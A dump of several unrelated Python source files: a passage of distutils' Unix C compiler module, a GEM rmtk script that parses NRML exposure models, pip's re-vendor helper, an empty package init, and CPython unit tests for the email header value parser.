DistutilsExecError, CompileError, LibError, LinkError
from distutils import log
# XXX Things not currently handled:
# * optimization/debug/warning flags; we just use whatever's in Python's
# Makefile and live with it. Is this adequate? If not, we might
# have to have a bunch of subclasses GNUCCompiler, SGICCompiler,
# SunCCompiler, and I suspect down that road lies madness.
# * even if we don't know a warning flag from an optimization flag,
# we need some way for outsiders to feed preprocessor/compiler/linker
# flags in to us -- eg. a sysadmin might want to mandate certain flags
# via a site config file, or a user might want to set something for
# compiling this module distribution only via the setup.py command
# line, whatever. As long as these options come from something on the
# current system, they can be as system-dependent as they like, and we
# should just happily stuff them into the preprocessor/compiler/linker
# options and carry on.
def _darwin_compiler_fixup(compiler_so, cc_args):
"""
This function will strip '-isysroot PATH' and '-arch ARCH' from the
compile flags if the user has specified one them in extra_compile_flags.
This is needed because '-arch ARCH' adds another architecture to the
build, without a way to remove an architecture. Furthermore GCC will
barf if multiple '-isysroot' arguments are present.
"""
stripArch = stripSysroot = 0
compiler_so = list(compiler_so)
kernel_version = os.uname()[2] # 8.4.3
major_version = int(kernel_version.split('.')[0])
if major_version < 8:
# OSX before 10.4.0, these don't support -arch and -isysroot at
# all.
stripArch = stripSysroot = True
else:
stripArch = '-arch' in cc_args
stripSysroot = '-isysroot' in cc_args
if stripArch or 'ARCHFLAGS' in os.environ:
while 1:
try:
index = compiler_so.index('-arch')
# Strip this argument and the next one:
del compiler_so[index:index+2]
except ValueError:
break
if 'ARCHFLAGS' in os.environ and not stripArch:
# User specified different -arch flags in the environ,
# see also distutils.sysconfig
compiler_so = compiler_so + os.environ['ARCHFLAGS'].split()
if stripSysroot:
try:
index = compiler_so.index('-isysroot')
# Strip this argument and the next one:
del compiler_so[index:index+2]
except ValueError:
pass
# Check if the SDK that is used during compilation actually exists,
# the universal build requires the usage of a universal SDK and not all
# users have that installed by default.
sysroot = None
if '-isysroot' in cc_args:
idx = cc_args.index('-isysroot')
sysroot = cc_args[idx+1]
elif '-isysroot' in compiler_so:
idx = compiler_so.index('-isysroot')
sysroot = compiler_so[idx+1]
if sysroot and not os.path.isdir(sysroot):
log.warn("Compiling with an SDK that doesn't seem to exist: %s",
sysroot)
log.warn("Please check your Xcode installation")
return compiler_so
class UnixCCompiler(CCompiler):
compiler_type = 'unix'
# These are used by CCompiler in two places: the constructor sets
# instance attributes 'preprocessor', 'compiler', etc. from them, and
# 'set_executable()' allows any of these to be set. The defaults here
# are pretty generic; they will probably have to be set by an outsider
# (eg. using information discovered by the sysconfig about building
# Python extensions).
executables = {'preprocessor' : None,
'compiler' : ["cc"],
'compiler_so' : ["cc"],
'compiler_cxx' : ["cc"],
'linker_so' : ["cc", "-shared"],
'linker_exe' : ["cc"],
'archiver' : ["ar", "-cr"],
'ranlib' : None,
}
if sys.platform[:6] == "darwin":
executables['ranlib'] = ["ranlib"]
# Needed for the filename generation methods provided by the base
# class, CCompiler. NB. whoever instantiates/uses a particular
# UnixCCompiler instance should set 'shared_lib_ext' -- we set a
# reasonable common default here, but it's not necessarily used on all
# Unices!
src_extensions = [".c",".C",".cc",".cxx",".cpp",".m"]
obj_extension = ".o"
static_lib_extension = ".a"
shared_lib_extension = ".so"
dylib_lib_extension = ".dylib"
static_lib_format = shared_lib_format = dylib_lib_format = "lib%s%s"
if sys.platform == "cygwin":
exe_extension = ".exe"
def preprocess(self, source,
output_file=None, macros=None, include_dirs=None,
extra_preargs=None, extra_postargs=None):
ignore, macros, include_dirs = \
self._fix_compile_args(None, macros, include_dirs)
pp_opts = gen_preprocess_options(macros, include_dirs)
pp_args = self.preprocessor + pp_opts
if output_file:
pp_args.extend(['-o', output_file])
if extra_preargs:
pp_args[:0] = extra_preargs
if extra_postargs:
pp_args.extend(extra_postargs)
pp_args.append(source)
# We need to preprocess: either we're being forced to, or we're
# generating output to stdout, or there's a target output file and
# the source file is newer than the target (or the target doesn't
# exist).
if self.force or output_file is None or newer(source, output_file):
if output_file:
self.mkpath(os.path.dirname(output_file))
try:
self.spawn(pp_args)
except DistutilsExecError, msg:
raise CompileError, msg
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
compiler_so = self.compiler_so
if sys.platform == 'darwin':
compiler_so = _darwin_compiler_fixup(compiler_so, cc_args + extra_postargs)
try:
self.spawn(compiler_so + cc_args + [src, '-o', obj] +
extra_postargs)
except DistutilsExecError, msg:
raise CompileError, msg
def create_static_lib(self, objects, output_libname,
output_dir=None, debug=0, target_lang=None):
objects, output_dir = self._fix_object_args(objects, output_dir)
output_filename = \
self.library_filename(output_libname, output_dir=output_dir)
if self._need_link(objects, output_filename):
self.mkpath(os.path.dirname(output_filename))
self.spawn(self.archiver +
[output_filename] +
objects + self.objects)
# Not many Unices required ranlib anymore -- SunOS 4.x is, I
# think the only major Unix that does. Maybe we need some
# platform intelligence here to skip ranlib if it's not
# needed -- or maybe Python's configure script took care of
# it for us, hence the check for leading colon.
if self.ranlib:
try:
self.spawn(self.ranlib + [output_filename])
except DistutilsExecError, msg:
raise LibError, msg
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self, target_desc, objects,
output_filename, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None):
objects, output_dir = self._fix_object_args(objects, output_dir)
libraries, library_dirs, runtime_library_dirs = \
self._fix_lib_args(libraries, library_dirs, runtime_library_dirs)
lib_opts = gen_lib_options(self, library_dirs, runtime_library_dirs,
libraries)
if type(output_dir) not in (StringType, NoneType):
raise TypeError, "'output_dir' must be a string or None"
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
ld_args = (objects + self.objects +
lib_opts + ['-o', output_filename])
if debug:
ld_args[:0] = ['-g']
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
if target_desc == CCompiler.EXECUTABLE:
linker = self.linker_exe[:]
else:
linker = self.linker_so[:]
if target_lang == "c++" and self.compiler_cxx:
# skip over environment variable settings if /usr/bin/env
# is used to set up the linker's environment.
# This is needed on OSX. Note: this assumes that the
# normal and C++ compiler have the same environment
# settings.
i = 0
if os.path.basename(linker[0]) == "env":
i = 1
while '=' in linker[i]:
i = i + 1
linker[i] = self.compiler_cxx[i]
if sys.platform == 'darwin':
linker = _darwin_compiler_fixup(linker, ld_args)
self.spawn(linker + ld_args)
except DistutilsExecError, msg:
raise LinkError, msg
else:
log.debug("skipping %s (up-to-date)", output_filename)
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "-L" + dir
def runtime_library_dir_option(self, dir):
# XXX Hackish, at the very least. See Python bug #445902:
# http://sourceforge.net/tracker/index.php
# ?func=detail&aid=445902&group_id=5470&atid=105470
# Linkers on different platforms need different options to
# specify that directories need to be added to the list of
# directories searched for dependencies when a dynamic library
# is sought. GCC has to be told to pass the -R option through
# to the linker, whereas other compilers just know this.
# Other compilers may need something slightly different. At
# this time, there's no way to determine this information from
# the configuration data stored in the Python installation, so
# we use this hack.
compiler = os.path.basename(sysconfig.get_config_var("CC"))
if sys.platform[:6] == "darwin":
# MacOSX's linker doesn't understand the -R flag at all
return "-L" + dir
elif sys.platform[:5] == "hp-ux":
return "+s -L" + dir
elif sys.platform[:7] == "irix646" or sys.platform[:6] == "osf1V5":
return ["-rpath", dir]
elif compiler[:3] == "gcc" or compiler[:3] == "g++":
return "-Wl,-R" + dir
else:
return "-R" + dir
def library_option(self, lib):
return "-l" + lib
def find_library_file(self, dirs, lib, debug=0):
shared_f = self.library_filename(lib, lib_type='shared')
dylib_f = self.library_filename(lib, lib_type='dylib')
static_f = self.library_filename(lib, lib_type='static')
for dir in dirs:
shared = os.path.join(dir, shared_f)
dylib = os.path.join(dir, dylib_f)
static = os.path.join(dir, static_f)
# We're second-guessing the linker here, with not much hard
# data to go on: GCC seems to prefer the shared library, so I'm
# assuming that *all* Unix C compilers do. And of course I'm
# ignoring even GCC's "-static" option. So sue me.
if os.path.exists(dylib):
return dylib
elif os.path.exists(shared):
return shared
elif os.path.exists(static):
return static
# Oops, didn't find it in *any* of 'dirs'
return None
|
mabevillar/rmtk
|
refs/heads/master
|
rmtk/plotting/common/parse_exposure.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# LICENSE
#
# Copyright (c) 2010-2014, GEM Foundation, V. Silva
#
# The Risk Modellers Toolkit is free software: you can redistribute
# it and/or modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either version
# 3 of the License, or (at your option) any later version.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>
#
# DISCLAIMER
#
# The software Risk Modellers Toolkit (rmtk) provided herein
# is released as a prototype implementation on behalf of
# scientists and engineers working within the GEM Foundation (Global
# Earthquake Model).
#
# It is distributed for the purpose of open collaboration and in the
# hope that it will be useful to the scientific, engineering, disaster
# risk and software design communities.
#
# The software is NOT distributed as part of GEMs OpenQuake suite
# (http://www.globalquakemodel.org/openquake) and must be considered as a
# separate entity. The software provided herein is designed and implemented
# by scientific staff. It is not developed to the design standards, nor
# subject to same level of critical review by professional software
# developers, as GEMs OpenQuake software suite.
#
# Feedback and contribution to the software is welcome, and can be
# directed to the risk scientific staff of the GEM Model Facility
# (risk@globalquakemodel.org).
#
# The Risk Modellers Toolkit (rmtk) is therefore distributed WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# The GEM Foundation, and the authors of the software, assume no
# liability for use of the software.
# -*- coding: utf-8 -*-
'''
Parse an exposure model in order to acquire the list of
ids and taxonomies
'''
import os
import csv
import argparse
import numpy as np
from lxml import etree
xmlNRML='{http://openquake.org/xmlns/nrml/0.4}'
xmlGML = '{http://www.opengis.net/gml}'
def exposureModelParser(input_file):
id_taxonomies = []
for _, element in etree.iterparse(input_file):
if element.tag == '%sasset' % xmlNRML:
id_taxonomies.append([element.attrib.get('id'), element.attrib.get('taxonomy')])
else:
continue
return id_taxonomies
def extractIDTaxonomies(nrml_exposure_model,save_flag):
'''
Extracts the taxonomies fro ma exposure model and save
to a text file if save_flag
'''
id_taxonomies = exposureModelParser(nrml_exposure_model)
if save_flag:
output_file = open(nrml_exposure_model.replace('xml','.txt'),'w')
for id_taxonomy in id_taxonomies:
output_file.write(id_taxonomy[0]+','+id_taxonomy[1]+'\n')
output_file.close()
return id_taxonomies
def set_up_arg_parser():
"""
Can run as executable. To do so, set up the command line parser
"""
parser = argparse.ArgumentParser(
description='Extract list of taxonomies from NRML vulnerability models file'
' .txt files. Inside the specified output directory, create a .txt '
'To run just type: python parse_vulnerability.py '
'--input-file=PATH_TO_VULNERABILITY_MODEL_NRML_FILE ', add_help=False)
flags = parser.add_argument_group('flag arguments')
flags.add_argument('-h', '--help', action='help')
flags.add_argument('--input-file',
help='path to vulnerability model NRML file (Required)',
default=None,
required=True)
flags.add_argument('--save', action="store_true",
help='Save taxonomies to a text file',
default=None,
required=False)
return parser
if __name__ == "__main__":
parser = set_up_arg_parser()
args = parser.parse_args()
if args.input_file:
extractIDTaxonomies(args.input_file,args.save)
|
Ahmad31/Web_Flask_Cassandra
|
refs/heads/master
|
flask/lib/python2.7/site-packages/pip/_vendor/re-vendor.py
|
1240
|
import os
import sys
import pip
import glob
import shutil
here = os.path.abspath(os.path.dirname(__file__))
def usage():
print("Usage: re-vendor.py [clean|vendor]")
sys.exit(1)
def clean():
for fn in os.listdir(here):
dirname = os.path.join(here, fn)
if os.path.isdir(dirname):
shutil.rmtree(dirname)
# six is a single file, not a package
os.unlink(os.path.join(here, 'six.py'))
def vendor():
pip.main(['install', '-t', here, '-r', 'vendor.txt'])
for dirname in glob.glob('*.egg-info'):
shutil.rmtree(dirname)
if __name__ == '__main__':
if len(sys.argv) != 2:
usage()
if sys.argv[1] == 'clean':
clean()
elif sys.argv[1] == 'vendor':
vendor()
else:
usage()
|
praekelt/txtalert
|
refs/heads/develop
|
txtalert/apps/general/__init__.py
|
12133432
| |
Zhongqilong/kbengine
|
refs/heads/master
|
kbe/res/scripts/common/Lib/test/test_email/test__header_value_parser.py
|
68
|
import string
import unittest
from email import _header_value_parser as parser
from email import errors
from email import policy
from test.test_email import TestEmailBase, parameterize
class TestTokens(TestEmailBase):
# EWWhiteSpaceTerminal
def test_EWWhiteSpaceTerminal(self):
x = parser.EWWhiteSpaceTerminal(' \t', 'fws')
self.assertEqual(x, ' \t')
self.assertEqual(str(x), '')
self.assertEqual(x.value, '')
self.assertEqual(x.encoded, ' \t')
# UnstructuredTokenList
def test_undecodable_bytes_error_preserved(self):
badstr = b"le pouf c\xaflebre".decode('ascii', 'surrogateescape')
unst = parser.get_unstructured(badstr)
self.assertDefectsEqual(unst.all_defects, [errors.UndecodableBytesDefect])
parts = list(unst.parts)
self.assertDefectsEqual(parts[0].all_defects, [])
self.assertDefectsEqual(parts[1].all_defects, [])
self.assertDefectsEqual(parts[2].all_defects, [errors.UndecodableBytesDefect])
class TestParserMixin:
def _assert_results(self, tl, rest, string, value, defects, remainder,
comments=None):
self.assertEqual(str(tl), string)
self.assertEqual(tl.value, value)
self.assertDefectsEqual(tl.all_defects, defects)
self.assertEqual(rest, remainder)
if comments is not None:
self.assertEqual(tl.comments, comments)
def _test_get_x(self, method, source, string, value, defects,
remainder, comments=None):
tl, rest = method(source)
self._assert_results(tl, rest, string, value, defects, remainder,
comments=None)
return tl
def _test_parse_x(self, method, input, string, value, defects,
comments=None):
tl = method(input)
self._assert_results(tl, '', string, value, defects, '', comments)
return tl
class TestParser(TestParserMixin, TestEmailBase):
# _wsp_splitter
rfc_printable_ascii = bytes(range(33, 127)).decode('ascii')
rfc_atext_chars = (string.ascii_letters + string.digits +
"!#$%&\'*+-/=?^_`{}|~")
rfc_dtext_chars = rfc_printable_ascii.translate(str.maketrans('','',r'\[]'))
def test__wsp_splitter_one_word(self):
self.assertEqual(parser._wsp_splitter('foo', 1), ['foo'])
def test__wsp_splitter_two_words(self):
self.assertEqual(parser._wsp_splitter('foo def', 1),
['foo', ' ', 'def'])
def test__wsp_splitter_ws_runs(self):
self.assertEqual(parser._wsp_splitter('foo \t def jik', 1),
['foo', ' \t ', 'def jik'])
# get_fws
def test_get_fws_only(self):
fws = self._test_get_x(parser.get_fws, ' \t ', ' \t ', ' ', [], '')
self.assertEqual(fws.token_type, 'fws')
def test_get_fws_space(self):
self._test_get_x(parser.get_fws, ' foo', ' ', ' ', [], 'foo')
def test_get_fws_ws_run(self):
self._test_get_x(parser.get_fws, ' \t foo ', ' \t ', ' ', [], 'foo ')
# get_encoded_word
def test_get_encoded_word_missing_start_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_encoded_word('abc')
def test_get_encoded_word_missing_end_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_encoded_word('=?abc')
def test_get_encoded_word_missing_middle_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_encoded_word('=?abc?=')
def test_get_encoded_word_valid_ew(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?this_is_a_test?= bird',
'this is a test',
'this is a test',
[],
' bird')
def test_get_encoded_word_internal_spaces(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?this is a test?= bird',
'this is a test',
'this is a test',
[errors.InvalidHeaderDefect],
' bird')
def test_get_encoded_word_gets_first(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?first?= =?utf-8?q?second?=',
'first',
'first',
[],
' =?utf-8?q?second?=')
def test_get_encoded_word_gets_first_even_if_no_space(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?first?==?utf-8?q?second?=',
'first',
'first',
[],
'=?utf-8?q?second?=')
def test_get_encoded_word_sets_extra_attributes(self):
ew = self._test_get_x(parser.get_encoded_word,
'=?us-ascii*jive?q?first_second?=',
'first second',
'first second',
[],
'')
self.assertEqual(ew.encoded, '=?us-ascii*jive?q?first_second?=')
self.assertEqual(ew.charset, 'us-ascii')
self.assertEqual(ew.lang, 'jive')
def test_get_encoded_word_lang_default_is_blank(self):
ew = self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?first_second?=',
'first second',
'first second',
[],
'')
self.assertEqual(ew.encoded, '=?us-ascii?q?first_second?=')
self.assertEqual(ew.charset, 'us-ascii')
self.assertEqual(ew.lang, '')
def test_get_encoded_word_non_printable_defect(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?first\x02second?=',
'first\x02second',
'first\x02second',
[errors.NonPrintableDefect],
'')
def test_get_encoded_word_leading_internal_space(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?=20foo?=',
' foo',
' foo',
[],
'')
def test_get_encoded_word_quopri_utf_escape_follows_cte(self):
# Issue 18044
self._test_get_x(parser.get_encoded_word,
'=?utf-8?q?=C3=89ric?=',
'Éric',
'Éric',
[],
'')
# get_unstructured
def _get_unst(self, value):
token = parser.get_unstructured(value)
return token, ''
def test_get_unstructured_null(self):
self._test_get_x(self._get_unst, '', '', '', [], '')
def test_get_unstructured_one_word(self):
self._test_get_x(self._get_unst, 'foo', 'foo', 'foo', [], '')
def test_get_unstructured_normal_phrase(self):
self._test_get_x(self._get_unst, 'foo bar bird',
'foo bar bird',
'foo bar bird',
[],
'')
def test_get_unstructured_normal_phrase_with_whitespace(self):
self._test_get_x(self._get_unst, 'foo \t bar bird',
'foo \t bar bird',
'foo bar bird',
[],
'')
def test_get_unstructured_leading_whitespace(self):
self._test_get_x(self._get_unst, ' foo bar',
' foo bar',
' foo bar',
[],
'')
def test_get_unstructured_trailing_whitespace(self):
self._test_get_x(self._get_unst, 'foo bar ',
'foo bar ',
'foo bar ',
[],
'')
def test_get_unstructured_leading_and_trailing_whitespace(self):
self._test_get_x(self._get_unst, ' foo bar ',
' foo bar ',
' foo bar ',
[],
'')
def test_get_unstructured_one_valid_ew_no_ws(self):
self._test_get_x(self._get_unst, '=?us-ascii?q?bar?=',
'bar',
'bar',
[],
'')
def test_get_unstructured_one_ew_trailing_ws(self):
self._test_get_x(self._get_unst, '=?us-ascii?q?bar?= ',
'bar ',
'bar ',
[],
'')
def test_get_unstructured_one_valid_ew_trailing_text(self):
self._test_get_x(self._get_unst, '=?us-ascii?q?bar?= bird',
'bar bird',
'bar bird',
[],
'')
def test_get_unstructured_phrase_with_ew_in_middle_of_text(self):
self._test_get_x(self._get_unst, 'foo =?us-ascii?q?bar?= bird',
'foo bar bird',
'foo bar bird',
[],
'')
def test_get_unstructured_phrase_with_two_ew(self):
self._test_get_x(self._get_unst,
'foo =?us-ascii?q?bar?= =?us-ascii?q?bird?=',
'foo barbird',
'foo barbird',
[],
'')
def test_get_unstructured_phrase_with_two_ew_trailing_ws(self):
self._test_get_x(self._get_unst,
'foo =?us-ascii?q?bar?= =?us-ascii?q?bird?= ',
'foo barbird ',
'foo barbird ',
[],
'')
def test_get_unstructured_phrase_with_ew_with_leading_ws(self):
self._test_get_x(self._get_unst,
' =?us-ascii?q?bar?=',
' bar',
' bar',
[],
'')
def test_get_unstructured_phrase_with_two_ew_extra_ws(self):
self._test_get_x(self._get_unst,
'foo =?us-ascii?q?bar?= \t =?us-ascii?q?bird?=',
'foo barbird',
'foo barbird',
[],
'')
def test_get_unstructured_two_ew_extra_ws_trailing_text(self):
self._test_get_x(self._get_unst,
'=?us-ascii?q?test?= =?us-ascii?q?foo?= val',
'testfoo val',
'testfoo val',
[],
'')
def test_get_unstructured_ew_with_internal_ws(self):
self._test_get_x(self._get_unst,
'=?iso-8859-1?q?hello=20world?=',
'hello world',
'hello world',
[],
'')
def test_get_unstructured_ew_with_internal_leading_ws(self):
self._test_get_x(self._get_unst,
' =?us-ascii?q?=20test?= =?us-ascii?q?=20foo?= val',
' test foo val',
' test foo val',
[],
'')
def test_get_unstructured_invaild_ew(self):
self._test_get_x(self._get_unst,
'=?test val',
'=?test val',
'=?test val',
[],
'')
def test_get_unstructured_undecodable_bytes(self):
self._test_get_x(self._get_unst,
b'test \xACfoo val'.decode('ascii', 'surrogateescape'),
'test \uDCACfoo val',
'test \uDCACfoo val',
[errors.UndecodableBytesDefect],
'')
def test_get_unstructured_undecodable_bytes_in_EW(self):
self._test_get_x(self._get_unst,
(b'=?us-ascii?q?=20test?= =?us-ascii?q?=20\xACfoo?='
b' val').decode('ascii', 'surrogateescape'),
' test \uDCACfoo val',
' test \uDCACfoo val',
[errors.UndecodableBytesDefect]*2,
'')
def test_get_unstructured_missing_base64_padding(self):
self._test_get_x(self._get_unst,
'=?utf-8?b?dmk?=',
'vi',
'vi',
[errors.InvalidBase64PaddingDefect],
'')
def test_get_unstructured_invalid_base64_character(self):
self._test_get_x(self._get_unst,
'=?utf-8?b?dm\x01k===?=',
'vi',
'vi',
[errors.InvalidBase64CharactersDefect],
'')
def test_get_unstructured_invalid_base64_character_and_bad_padding(self):
self._test_get_x(self._get_unst,
'=?utf-8?b?dm\x01k?=',
'vi',
'vi',
[errors.InvalidBase64CharactersDefect,
errors.InvalidBase64PaddingDefect],
'')
def test_get_unstructured_no_whitespace_between_ews(self):
self._test_get_x(self._get_unst,
'=?utf-8?q?foo?==?utf-8?q?bar?=',
'foobar',
'foobar',
[errors.InvalidHeaderDefect],
'')
# get_qp_ctext
def test_get_qp_ctext_only(self):
ptext = self._test_get_x(parser.get_qp_ctext,
'foobar', 'foobar', ' ', [], '')
self.assertEqual(ptext.token_type, 'ptext')
def test_get_qp_ctext_all_printables(self):
with_qp = self.rfc_printable_ascii.replace('\\', '\\\\')
with_qp = with_qp. replace('(', r'\(')
with_qp = with_qp.replace(')', r'\)')
ptext = self._test_get_x(parser.get_qp_ctext,
with_qp, self.rfc_printable_ascii, ' ', [], '')
def test_get_qp_ctext_two_words_gets_first(self):
self._test_get_x(parser.get_qp_ctext,
'foo de', 'foo', ' ', [], ' de')
def test_get_qp_ctext_following_wsp_preserved(self):
self._test_get_x(parser.get_qp_ctext,
'foo \t\tde', 'foo', ' ', [], ' \t\tde')
def test_get_qp_ctext_up_to_close_paren_only(self):
self._test_get_x(parser.get_qp_ctext,
'foo)', 'foo', ' ', [], ')')
def test_get_qp_ctext_wsp_before_close_paren_preserved(self):
self._test_get_x(parser.get_qp_ctext,
'foo )', 'foo', ' ', [], ' )')
def test_get_qp_ctext_close_paren_mid_word(self):
self._test_get_x(parser.get_qp_ctext,
'foo)bar', 'foo', ' ', [], ')bar')
def test_get_qp_ctext_up_to_open_paren_only(self):
self._test_get_x(parser.get_qp_ctext,
'foo(', 'foo', ' ', [], '(')
def test_get_qp_ctext_wsp_before_open_paren_preserved(self):
self._test_get_x(parser.get_qp_ctext,
'foo (', 'foo', ' ', [], ' (')
def test_get_qp_ctext_open_paren_mid_word(self):
self._test_get_x(parser.get_qp_ctext,
'foo(bar', 'foo', ' ', [], '(bar')
def test_get_qp_ctext_non_printables(self):
ptext = self._test_get_x(parser.get_qp_ctext,
'foo\x00bar)', 'foo\x00bar', ' ',
[errors.NonPrintableDefect], ')')
self.assertEqual(ptext.defects[0].non_printables[0], '\x00')
# get_qcontent
def test_get_qcontent_only(self):
ptext = self._test_get_x(parser.get_qcontent,
'foobar', 'foobar', 'foobar', [], '')
self.assertEqual(ptext.token_type, 'ptext')
def test_get_qcontent_all_printables(self):
with_qp = self.rfc_printable_ascii.replace('\\', '\\\\')
with_qp = with_qp. replace('"', r'\"')
ptext = self._test_get_x(parser.get_qcontent, with_qp,
self.rfc_printable_ascii,
self.rfc_printable_ascii, [], '')
def test_get_qcontent_two_words_gets_first(self):
self._test_get_x(parser.get_qcontent,
'foo de', 'foo', 'foo', [], ' de')
def test_get_qcontent_following_wsp_preserved(self):
self._test_get_x(parser.get_qcontent,
'foo \t\tde', 'foo', 'foo', [], ' \t\tde')
def test_get_qcontent_up_to_dquote_only(self):
self._test_get_x(parser.get_qcontent,
'foo"', 'foo', 'foo', [], '"')
def test_get_qcontent_wsp_before_close_paren_preserved(self):
self._test_get_x(parser.get_qcontent,
'foo "', 'foo', 'foo', [], ' "')
def test_get_qcontent_close_paren_mid_word(self):
self._test_get_x(parser.get_qcontent,
'foo"bar', 'foo', 'foo', [], '"bar')
def test_get_qcontent_non_printables(self):
ptext = self._test_get_x(parser.get_qcontent,
'foo\x00fg"', 'foo\x00fg', 'foo\x00fg',
[errors.NonPrintableDefect], '"')
self.assertEqual(ptext.defects[0].non_printables[0], '\x00')
# get_atext
def test_get_atext_only(self):
atext = self._test_get_x(parser.get_atext,
'foobar', 'foobar', 'foobar', [], '')
self.assertEqual(atext.token_type, 'atext')
def test_get_atext_all_atext(self):
atext = self._test_get_x(parser.get_atext, self.rfc_atext_chars,
self.rfc_atext_chars,
self.rfc_atext_chars, [], '')
def test_get_atext_two_words_gets_first(self):
self._test_get_x(parser.get_atext,
'foo bar', 'foo', 'foo', [], ' bar')
def test_get_atext_following_wsp_preserved(self):
self._test_get_x(parser.get_atext,
'foo \t\tbar', 'foo', 'foo', [], ' \t\tbar')
def test_get_atext_up_to_special(self):
self._test_get_x(parser.get_atext,
'foo@bar', 'foo', 'foo', [], '@bar')
def test_get_atext_non_printables(self):
atext = self._test_get_x(parser.get_atext,
'foo\x00bar(', 'foo\x00bar', 'foo\x00bar',
[errors.NonPrintableDefect], '(')
self.assertEqual(atext.defects[0].non_printables[0], '\x00')
# get_bare_quoted_string
def test_get_bare_quoted_string_only(self):
bqs = self._test_get_x(parser.get_bare_quoted_string,
'"foo"', '"foo"', 'foo', [], '')
self.assertEqual(bqs.token_type, 'bare-quoted-string')
def test_get_bare_quoted_string_must_start_with_dquote(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_bare_quoted_string('foo"')
with self.assertRaises(errors.HeaderParseError):
parser.get_bare_quoted_string(' "foo"')
def test_get_bare_quoted_string_following_wsp_preserved(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo"\t bar', '"foo"', 'foo', [], '\t bar')
def test_get_bare_quoted_string_multiple_words(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo bar moo"', '"foo bar moo"', 'foo bar moo', [], '')
def test_get_bare_quoted_string_multiple_words_wsp_preserved(self):
self._test_get_x(parser.get_bare_quoted_string,
'" foo moo\t"', '" foo moo\t"', ' foo moo\t', [], '')
def test_get_bare_quoted_string_end_dquote_mid_word(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo"bar', '"foo"', 'foo', [], 'bar')
def test_get_bare_quoted_string_quoted_dquote(self):
self._test_get_x(parser.get_bare_quoted_string,
r'"foo\"in"a', r'"foo\"in"', 'foo"in', [], 'a')
def test_get_bare_quoted_string_non_printables(self):
self._test_get_x(parser.get_bare_quoted_string,
'"a\x01a"', '"a\x01a"', 'a\x01a',
[errors.NonPrintableDefect], '')
def test_get_bare_quoted_string_no_end_dquote(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo', '"foo"', 'foo',
[errors.InvalidHeaderDefect], '')
self._test_get_x(parser.get_bare_quoted_string,
'"foo ', '"foo "', 'foo ',
[errors.InvalidHeaderDefect], '')
def test_get_bare_quoted_string_empty_quotes(self):
self._test_get_x(parser.get_bare_quoted_string,
'""', '""', '', [], '')
# Issue 16983: apply postel's law to some bad encoding.
def test_encoded_word_inside_quotes(self):
self._test_get_x(parser.get_bare_quoted_string,
'"=?utf-8?Q?not_really_valid?="',
'"not really valid"',
'not really valid',
[errors.InvalidHeaderDefect],
'')
# get_comment
def test_get_comment_only(self):
comment = self._test_get_x(parser.get_comment,
'(comment)', '(comment)', ' ', [], '', ['comment'])
self.assertEqual(comment.token_type, 'comment')
def test_get_comment_must_start_with_paren(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_comment('foo"')
with self.assertRaises(errors.HeaderParseError):
parser.get_comment(' (foo"')
def test_get_comment_following_wsp_preserved(self):
self._test_get_x(parser.get_comment,
'(comment) \t', '(comment)', ' ', [], ' \t', ['comment'])
def test_get_comment_multiple_words(self):
self._test_get_x(parser.get_comment,
'(foo bar) \t', '(foo bar)', ' ', [], ' \t', ['foo bar'])
def test_get_comment_multiple_words_wsp_preserved(self):
self._test_get_x(parser.get_comment,
'( foo bar\t ) \t', '( foo bar\t )', ' ', [], ' \t',
[' foo bar\t '])
def test_get_comment_end_paren_mid_word(self):
self._test_get_x(parser.get_comment,
'(foo)bar', '(foo)', ' ', [], 'bar', ['foo'])
def test_get_comment_quoted_parens(self):
self._test_get_x(parser.get_comment,
'(foo\) \(\)bar)', '(foo\) \(\)bar)', ' ', [], '', ['foo) ()bar'])
def test_get_comment_non_printable(self):
self._test_get_x(parser.get_comment,
'(foo\x7Fbar)', '(foo\x7Fbar)', ' ',
[errors.NonPrintableDefect], '', ['foo\x7Fbar'])
def test_get_comment_no_end_paren(self):
self._test_get_x(parser.get_comment,
'(foo bar', '(foo bar)', ' ',
[errors.InvalidHeaderDefect], '', ['foo bar'])
self._test_get_x(parser.get_comment,
'(foo bar ', '(foo bar )', ' ',
[errors.InvalidHeaderDefect], '', ['foo bar '])
def test_get_comment_nested_comment(self):
comment = self._test_get_x(parser.get_comment,
'(foo(bar))', '(foo(bar))', ' ', [], '', ['foo(bar)'])
self.assertEqual(comment[1].content, 'bar')
def test_get_comment_nested_comment_wsp(self):
comment = self._test_get_x(parser.get_comment,
'(foo ( bar ) )', '(foo ( bar ) )', ' ', [], '', ['foo ( bar ) '])
self.assertEqual(comment[2].content, ' bar ')
def test_get_comment_empty_comment(self):
self._test_get_x(parser.get_comment,
'()', '()', ' ', [], '', [''])
